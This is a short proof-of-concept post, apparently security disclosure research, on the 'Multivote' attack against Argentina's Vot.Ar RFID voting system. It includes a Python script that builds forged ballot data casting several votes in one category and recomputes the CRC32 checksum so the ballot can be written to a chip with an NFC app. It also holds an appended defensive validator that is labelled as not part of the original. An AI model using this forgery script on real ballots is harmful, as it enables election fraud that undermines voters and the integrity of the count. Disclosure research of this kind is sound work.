Multivote attack on Vot.Ar system: PoC

RFID ballots have a simple structure. The following example shows a ballot for “Representative” (REP), “Mayor” (MAY), and “Ward” (WRD) for the province of Buenos Aires (CABA):


And this is a ballot that casts three votes for the category “Mayor”:


And this is one that casts 10 votes for “Mayor”:


There are other possibilities. The following ballot casts one vote for each category, and then adds six additional votes for “Mayor”:


Multi-vote ballot generator

The Python script below generates the correct CRC32 checksum for the RFID chip. Details about the format used in these ballots are available in some GitHub projects. These values can be added manually through an Android-based NFC application with write capabilities, like NFC-V.

from zlib import crc32
from struct import pack
ballot="06CABA.1WRD1234REP5678MAY5678" # original
ballot="06CABA.1WRD1234MAY5678MAY5678" # 2 MAY
print "Message length: %02X" % len(ballot)
print "CRC: %s" % ' '.join(map(lambda x:"%02X"%ord(x),pack("i",crc32(ballot))))
print "Ballot data: %s" % ' '.join(map(lambda x:"%02X"%ord(x),ballot))
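
A counting-side check for the ballots described above, as an added example (Python 3) that is not part of the original post or of the Vot.Ar code. It assumes the payload layout visible in the script's sample string (two-digit location length, location, then three-letter category plus four-digit choice); EXPECTED_CATEGORIES, parse_ballot and validate_ballot are hypothetical names. A matching CRC32 only shows the data was not corrupted, so the check also rejects any category that appears more than once.

```python
import re
from zlib import crc32

# Categories taken from the page's sample ballot; a real election would load these per district.
EXPECTED_CATEGORIES = {"WRD", "REP", "MAY"}


class BallotError(ValueError):
    """Raised when a ballot payload must not be counted."""


def parse_ballot(payload):
    """Split a payload into (location, [(category, choice), ...]).

    Assumed layout (inferred from the sample string, not a published spec):
    two-digit location length, location, then 3-letter category + 4-digit choice.
    """
    head = re.fullmatch(r"([0-9]{2})(.*)", payload, re.S)
    if not head:
        raise BallotError("missing location length")
    n = int(head.group(1))
    location, body = head.group(2)[:n], head.group(2)[n:]
    if len(location) != n:
        raise BallotError("truncated location")
    if not re.fullmatch(r"(?:[A-Z]{3}[0-9]{4})+", body):
        raise BallotError("malformed selections")
    return location, [(body[i:i + 3], body[i + 3:i + 7]) for i in range(0, len(body), 7)]


def validate_ballot(payload, stored_crc):
    """Return (location, {category: choice}) or raise BallotError."""
    # CRC32 is an integrity check only: anyone who can write the tag can recompute it.
    if crc32(payload.encode("utf-8")) & 0xFFFFFFFF != stored_crc & 0xFFFFFFFF:
        raise BallotError("CRC mismatch")
    location, selections = parse_ballot(payload)
    votes = {}
    for category, choice in selections:
        if category not in EXPECTED_CATEGORIES:
            raise BallotError("unknown category " + category)
        if category in votes:  # the multivote condition: one category, several votes
            raise BallotError("duplicate category " + category)
        votes[category] = choice
    return location, votes
```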

Translated by: Juliano Rizzo

This is a short description of the Multivote attack Proof of Concept on the Vot.Ar system. More info in the full report.
